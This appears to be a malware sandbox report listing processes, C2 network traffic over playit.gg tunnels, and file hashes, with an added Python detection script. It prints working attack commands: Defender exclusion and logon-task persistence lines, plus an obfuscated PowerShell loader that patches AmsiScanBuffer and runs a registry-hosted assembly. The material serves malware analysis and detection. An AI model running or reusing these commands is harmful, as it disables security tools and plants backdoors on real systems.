C:\Windows\System32\WaaSMedicAgent.exe 3874f99676d2a171db1648b456c00305 AF6bVzg0Nk+Uob03FtQ14g.0.1.0.0.0
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node32.exe'
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node32" /SC ONLOGON /TR "C:\Windows\System32\$Node32.exe" /RL HIGHEST
C:\Windows\System32\$Node32.exe
"C:\Windows\System32\$Node32.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node2Json.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:NmGdSppURqqL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MQoQQivOdnqpQn,[Parameter(Position=1)][Type]$brBwrasQPu)$tNVMvHtSxhf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+'l'+'e'+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'le'+'g'+''+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+'p'+'e'+'',''+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,S'+[Char](101)+''+[Char](97)+''+[Char](108)+'ed'+','+''+[Char](65)+'n'+'s'+''+'i'+'C'+'l'+''+[Char](97)+''+'s'+''+'s'+','+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$tNVMvHtSxhf.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+'e'+''+[Char](99)+''+'i'+''+'a'+''+'l'+'N'+[Char](97)+''+[Char](109)+'e'+[Char](44)+'Hid'+'e'+'By'+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$MQoQQivOdnqpQn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+'ime,'+'M'+''+'a'+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+'d');$tNVMvHtSxhf.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+'S'+''+'l'+''+'o'+''+[Char](116)+''+','+'V'
+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$brBwrasQPu,$MQoQQivOdnqpQn).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+',M'+'a'+'na'+'g'+'e'+[Char](100)+'');Write-Output $tNVMvHtSxhf.CreateType();}$SOWVGuXakUZFC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+'t'+'e'+'m.'+[Char](100)+''+[Char](108)+'l')}).GetType('M'+'i'+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+'.'+'W'+'i'+''+'n'+''+[Char](51)+''+'2'+''+'.'+''+'U'+''+'n'+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+'ve'+[Char](77)+'e'+[Char](116)+'h'+'o'+''+[Char](100)+'s');$vXuVyjDcpUaZxj=$SOWVGuXakUZFC.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+'r'+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+'b'+[Char](108)+'i'+'c'+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HGXpWVZeCoipORtRsmd=NmGdSppURqqL @([String])([IntPtr]);$ZDOxEshTmBMFRKRmZMmVew=NmGdSppURqqL 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jGQpogqSIBl=$SOWVGuXakUZFC.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+'o'+'d'+'ul'+'e'+'Han'+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+'r'+''+[Char](110)+'el'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$zrftaLTEZxtDJV=$vXuVyjDcpUaZxj.Invoke($Null,@([Object]$jGQpogqSIBl,[Object](''+[Char](76)+''+'o'+'a'+'d'+''+[Char](76)+'ib'+'r'+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$JHlGsvfaGyzWHbMmv=$vXuVyjDcpUaZxj.Invoke($Null,@([Object]$jGQpogqSIBl,[Object]('Vir'+[Char](116)+'ua'+'l'+''+[Char](80)+'r'+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$WUegRNP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zrftaLTEZxtDJV,$HGXpWVZeCoipORtRsmd).Invoke(''+[Char](97)+''+'m'+''+'s'+'i'+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');$kykrGHgouzOPlRUcE=$vXuVyjDcpUaZxj.Invoke($Null,@([Object]$WUegRNP,[Object](''+'A'+''+[Char](109)+''+'s'+''+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+[Char](101)+'r')));$PYOkbsexQE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JHlGsvfaGyzWHbMmv,$ZDOxEshTmBMFRKRmZMmVew).Invoke($kykrGHgouzOPlRUcE,[uint32]8,4,[ref]$PYOkbsexQE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kykrGHgouzOPlRUcE,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JHlGsvfaGyzWHbMmv,$ZDOxEshTmBMFRKRmZMmVew).Invoke($kykrGHgouzOPlRUcE,[uint32]8,0x20,[ref]$PYOkbsexQE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](78)+'od'+[Char](101)+'s'+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node2Json" /SC ONLOGON /TR "C:\Windows\System32\$Node2Json.exe" /RL HIGHEST
C:\Windows\System32\$Node2Json.exe
"C:\Windows\System32\$Node2Json.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node3Json.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node3Json" /SC ONLOGON /TR "C:\Windows\System32\$Node3Json.exe" /RL HIGHEST
C:\Windows\System32\$Node3Json.exe
"C:\Windows\System32\$Node3Json.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{f2983257-2dd5-4945-ba26-cc09f94ee010}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | visit-kill.gl.at.ply.gg | udp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | every-bend.gl.at.ply.gg | udp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 216.203.100.95.in-addr.arpa | udp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 201.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
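Taken together, the process chain and the network table above give a compact detection set: a PowerShell `Add-MpPreference -ExclusionPath` for a file in System32, a `schtasks /Create ... /SC ONLOGON ... /RL HIGHEST` task for that same file, an obfuscated PowerShell that patches memory and loads an assembly from the registry, and C2 over playit.gg tunnels (`*.gl.at.ply.gg` on random high ports) preceded by an ip-api.com lookup and pastebin.com fetches. The following Python is an added example, not part of the report: it runs those rules over constructed event records built from this report's own command lines and destinations. The record layout, the rule names and the `[Char]` token threshold are assumptions for the example; map them onto whatever your Sysmon or EDR export looks like.

```python
import re

# Constructed sample events, modelled on the process list and network table of this
# report. The command lines and destinations are copied from the report; the record
# layout is an assumption for this example, not a Sysmon or sandbox export format, and
# the obfuscated powershell.EXE command is cut down to the fragments the rules key on.
PROCESS_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass '
            r"Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node32.exe'"},
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node32" /SC ONLOGON '
            r'/TR "C:\Windows\System32\$Node32.exe" /RL HIGHEST'},
    {"image": r"C:\Windows\System32\$Node32.exe", "cmd": r'"C:\Windows\System32\$Node32.exe"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "'
            r"$WUegRNP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zrftaLTEZxtDJV,$HGXpWVZeCoipORtRsmd)"
            r".Invoke(''+[Char](97)+''+'m'+''+'s'+'i'+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');"
            r"$kykrGHgouzOPlRUcE=$vXuVyjDcpUaZxj.Invoke($Null,@([Object]$WUegRNP,[Object](''+'A'+''+[Char](109)+''+'s'+''+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+[Char](101)+'r')));"
            r"[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kykrGHgouzOPlRUcE,6);"
            r"[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'')"
            r".GetValue('$'+[Char](78)+'od'+[Char](101)+'s'+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
            r'"'},
]
NETWORK_EVENTS = [
    {"dst": "8.8.8.8:53", "domain": "ip-api.com", "proto": "udp"},
    {"dst": "208.95.112.1:80", "domain": "ip-api.com", "proto": "tcp"},
    {"dst": "104.20.3.235:443", "domain": "pastebin.com", "proto": "tcp"},
    {"dst": "147.185.221.23:51861", "domain": "visit-kill.gl.at.ply.gg", "proto": "tcp"},
    {"dst": "147.185.221.21:48150", "domain": "every-bend.gl.at.ply.gg", "proto": "tcp"},
]

CHAR_TOKEN_THRESHOLD = 10  # assumption: [Char](N) tokens per command before we call it obfuscated
STAGING_HOSTS = {"pastebin.com", "raw.githubusercontent.com"}  # the hosting services seen in this report

def _basename(image):
    return image.rsplit("\\", 1)[-1].lower()

def check_process(ev):
    """Return (rule, detail) pairs for one process-creation record."""
    hits, cmd, low = [], ev["cmd"], ev["cmd"].lower()
    name = _basename(ev["image"])
    if name in ("powershell.exe", "pwsh.exe"):
        if "add-mppreference" in low and "-exclusionpath" in low:
            m = re.search(r"-exclusionpath\s+(?:'([^']*)'|(\S+))", cmd, re.I)
            hits.append(("defender_exclusion", (m.group(1) or m.group(2)) if m else cmd))
        n = len(re.findall(r"\[char\]\(\d+\)", cmd, re.I))
        if n >= CHAR_TOKEN_THRESHOLD:
            hits.append(("obfuscated_powershell", f"{n} [Char]() tokens"))
        if "getdelegateforfunctionpointer" in low and "marshal]::copy(" in low:
            hits.append(("in_memory_patch", "native function resolved via delegate, then overwritten with Marshal.Copy"))
        if "[reflection.assembly]::load(" in low and "registry]::localmachine" in low:
            hits.append(("registry_hosted_assembly", "Assembly.Load of bytes read from an HKLM value"))
    if name == "schtasks.exe" and all(k in low for k in ("/create", "/sc onlogon", "/rl highest")):
        m = re.search(r'/tr\s+"([^"]+)"', cmd, re.I)
        hits.append(("logon_task_highest", m.group(1) if m else cmd))
    return hits

def check_network(ev):
    """Return (rule, detail) pairs for one connection record; DNS (udp) rows are skipped."""
    hits = []
    if ev["proto"] != "tcp":
        return hits
    host, _, port = ev["dst"].rpartition(":")
    port, domain = int(port), ev["domain"].lower()
    if domain.endswith(".ply.gg") and port not in (80, 443):  # playit.gg tunnel on a random high port
        hits.append(("tunnel_c2", f"{domain} -> {host}:{port}"))
    if domain == "ip-api.com":
        hits.append(("external_ip_lookup", domain))
    if domain in STAGING_HOSTS:
        hits.append(("hosting_service_stage", domain))
    return hits

def triage(process_events, network_events):
    """Aggregate hits as {rule: [detail, ...]} so each rule can be reviewed in one place."""
    findings = {}
    for ev in process_events:
        for rule, detail in check_process(ev):
            findings.setdefault(rule, []).append(detail)
    for ev in network_events:
        for rule, detail in check_network(ev):
            findings.setdefault(rule, []).append(detail)
    return findings

if __name__ == "__main__":
    for rule, details in triage(PROCESS_EVENTS, NETWORK_EVENTS).items():
        print(rule)
        for d in details:
            print("   ", d)
```

Each rule is kept narrow: the exclusion rule keys on the cmdlet and parameter rather than on the path, the task rule needs all three of `/Create`, `ONLOGON` and `HIGHEST`, and the memory-patch rule pairs `GetDelegateForFunctionPointer` with `Marshal::Copy`, which in this sample are left in clear text while the Win32 names are obfuscated. Those two identifiers can be hidden through reflection as well, so treat that rule as one signal among several rather than as a definitive match. DNS rows are skipped so the same destination is not counted twice.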
Files
memory/2568-0-0x00007FF891683000-0x00007FF891685000-memory.dmp
memory/2568-1-0x0000000000D90000-0x0000000000DF2000-memory.dmp
memory/2568-2-0x00007FF891680000-0x00007FF892142000-memory.dmp
memory/2064-12-0x0000011548060000-0x0000011548082000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m3m1p1a5.dma.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2064-13-0x00007FF891680000-0x00007FF892142000-memory.dmp
memory/2064-14-0x00007FF891680000-0x00007FF892142000-memory.dmp
memory/2064-15-0x00007FF891680000-0x00007FF892142000-memory.dmp
memory/2064-16-0x00007FF891680000-0x00007FF892142000-memory.dmp
memory/2064-19-0x00007FF891680000-0x00007FF892142000-memory.dmp
memory/2064-20-0x00007FF891680000-0x00007FF892142000-memory.dmp
C:\Windows\System32\$Node32.exe
| MD5 | b850f016450d68da0ae4bb945355f70c |
| SHA1 | 521726c38af715e6ee1c76315151f0ed9518c6f4 |
| SHA256 | 8a649909d1defa1b8966cde6ad854f3cbf7662a732cf1a16b853c793cf240d24 |
| SHA512 | 30f152e08ba44308da9b9c42951e45a9b6c2ad808c3a426da4af0384939816e04f1faf38de1d3c404e515d90b2e2eaeabe152b0151fb3f21c6a00bd2fdac3b6c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3eb3833f769dd890afc295b977eab4b4 |
| SHA1 | e857649b037939602c72ad003e5d3698695f436f |
| SHA256 | c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485 |
| SHA512 | c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b5bf6b0261deb53c0e3d422e3f83a664 |
| SHA1 | 60cd83ab6dd15abaa9abf34d9ab54e42c8eefa16 |
| SHA256 | a431a9e84c64c6ad29339df6a714cb697081dc1c6c5557ada967d4caaeed0c1c |
| SHA512 | 27dfba0d2d7ebce4e6eebdeefa81b2518c5222efb9d37b4c323023e5117eed30ad6aeba8e062bde96d17d53b01bb9a59313229aeaf4863c8b30d9bbb09d46bff |
C:\Windows\System32\$Node2Json.exe
| MD5 | 41814c2aa6f0aaffaaaa26ffd07b3550 |
| SHA1 | ea9731c42a382ed003b5b4bfd28c3ba437c8d14a |
| SHA256 | da2926ac30bda874255c093b58a8a4efa4b8e7872393ea4a242f17a4e3ab014e |
| SHA512 | f2513d8e10536bd747dd1ec4a6aa9ec0007ea9a4484c364b2cf9d5ffd42cf3bcd0e346040d4c34c3dba28a208752b82c41bdae2a9dd88ebc1ba869cd1907877d |
memory/3788-70-0x0000000000850000-0x0000000000872000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 380667346230f568b33ee306d145cd0c |
| SHA1 | 761128658280c2f8070f879fe0173759e2147421 |
| SHA256 | 34fd03e6c7b265c580eff0085960004daaa90c16473cbc236c263a453767c4c8 |
| SHA512 | 32b89cffccf694b51872b9088759e3c6cd1e2c3fcbd0219b24fd1f7f191422fecaad6f77c9d57330281826c3609587cba942994de077662d9d1606a57f64a55b |
C:\Windows\System32\$Node3Json.exe
| MD5 | 391d4f99d0076ce566b370f1572ef670 |
| SHA1 | 0bf04beb77440315098bacf30563a6542e254a45 |
| SHA256 | b55dbc5b3437654eca9fd1ea4826f81bde74af9e0c69109c25188461eb6a3605 |
| SHA512 | 1952fa90fc139863381c15f424a8146335cbbc6f443efcdffc502f1064889a244fa7da1b30ebd4c9b2bec15fd55d367a2aa80afd576b1e2c4baed40ffec76497 |
memory/3280-100-0x00000000004C0000-0x00000000004E2000-memory.dmp
memory/2568-101-0x00007FF891680000-0x00007FF892142000-memory.dmp
memory/1300-104-0x00007FF8AF530000-0x00007FF8AF5ED000-memory.dmp
memory/1300-103-0x00007FF8AFAF0000-0x00007FF8AFCE8000-memory.dmp
memory/324-110-0x0000000140000000-0x0000000140008000-memory.dmp
memory/324-112-0x00007FF8AF530000-0x00007FF8AF5ED000-memory.dmp
memory/324-111-0x00007FF8AFAF0000-0x00007FF8AFCE8000-memory.dmp
memory/324-113-0x0000000140000000-0x0000000140008000-memory.dmp
memory/408-150-0x000001F94FF70000-0x000001F94FF9A000-memory.dmp
memory/400-164-0x00007FF86FB70000-0x00007FF86FB80000-memory.dmp
memory/400-163-0x0000027C4C1C0000-0x0000027C4C1EA000-memory.dmp
memory/400-158-0x0000027C4C1C0000-0x0000027C4C1EA000-memory.dmp
memory/408-154-0x00007FF86FB70000-0x00007FF86FB80000-memory.dmp
memory/408-153-0x000001F94FF70000-0x000001F94FF9A000-memory.dmp
memory/964-144-0x00007FF86FB70000-0x00007FF86FB80000-memory.dmp
memory/964-143-0x000001F4F1DA0000-0x000001F4F1DCA000-memory.dmp
memory/964-138-0x000001F4F1DA0000-0x000001F4F1DCA000-memory.dmp
memory/676-133-0x0000020DDE630000-0x0000020DDE65A000-memory.dmp
memory/676-134-0x00007FF86FB70000-0x00007FF86FB80000-memory.dmp
memory/676-128-0x0000020DDE630000-0x0000020DDE65A000-memory.dmp
memory/628-124-0x00007FF86FB70000-0x00007FF86FB80000-memory.dmp
memory/628-123-0x0000025298080000-0x00000252980AA000-memory.dmp
memory/628-118-0x0000025298080000-0x00000252980AA000-memory.dmp
memory/628-117-0x0000025298080000-0x00000252980AA000-memory.dmp
memory/628-116-0x0000025298050000-0x0000025298075000-memory.dmp
memory/324-107-0x0000000140000000-0x0000000140008000-memory.dmp
memory/324-108-0x0000000140000000-0x0000000140008000-memory.dmp
memory/324-105-0x0000000140000000-0x0000000140008000-memory.dmp
memory/324-106-0x0000000140000000-0x0000000140008000-memory.dmp
memory/1300-102-0x00000147D7250000-0x00000147D727A000-memory.dmp
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | a9124c4c97cba8a07a8204fac1696c8e |
| SHA1 | 1f27d80280e03762c7b16781608786f5a98ff434 |
| SHA256 | 8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21 |
| SHA512 | 537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 4ac1741ceb19f5a983079b2c5f344f5d |
| SHA1 | f1ebd93fbade2e035cd59e970787b8042cdd0f3b |
| SHA256 | 7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc |
| SHA512 | 583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | 39b9eb9d1a56bc1792c844c425bd1dec |
| SHA1 | db5a91082fa14eeb6550cbc994d34ebd95341df9 |
| SHA256 | acade97e8a1d30477d0dc3fdfea70c2c617c369b56115ec708ed8a2cfdbc3692 |
| SHA512 | 255b1c1c456b20e6e3415540ef8af58e723f965d1fa782da44a6bbc81b43d8a31c5681777ba885f91ed2dae480bc2a4023e01fe2986857b13323f0459520eb51 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | c6086d02f8ce044f5fa07a98303dc7eb |
| SHA1 | 6116247e9d098b276b476c9f4c434f55d469129c |
| SHA256 | 8901d9c9aea465da4ea7aa874610a90b8cf0a71eba0e321cf9675fceee0b54a0 |
| SHA512 | 1876d8fc1a8ac83aadb725100ea7a1791bd62d4d0edc1b78802e0bffe458f309a66dc97e1b9da60dd52b8cb80bf471ccb5f8480e6192c9eb2a13eac36462d27a |
Analysis: behavioral19
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
92s
Max time network
147s
Command Line
Signatures
Downloads MZ/PE file
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Roblox.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Roblox.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Roblox.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Roblox.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Roblox.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 2024
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
memory/4396-0-0x00000000743BE000-0x00000000743BF000-memory.dmp
memory/4396-1-0x0000000000A00000-0x0000000000A0E000-memory.dmp
memory/4396-2-0x00000000743B0000-0x0000000074B61000-memory.dmp
memory/4396-3-0x00000000743BE000-0x00000000743BF000-memory.dmp
memory/4396-4-0x00000000743B0000-0x0000000074B61000-memory.dmp
memory/4396-5-0x00000000743B0000-0x0000000074B61000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
96s
Max time network
146s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
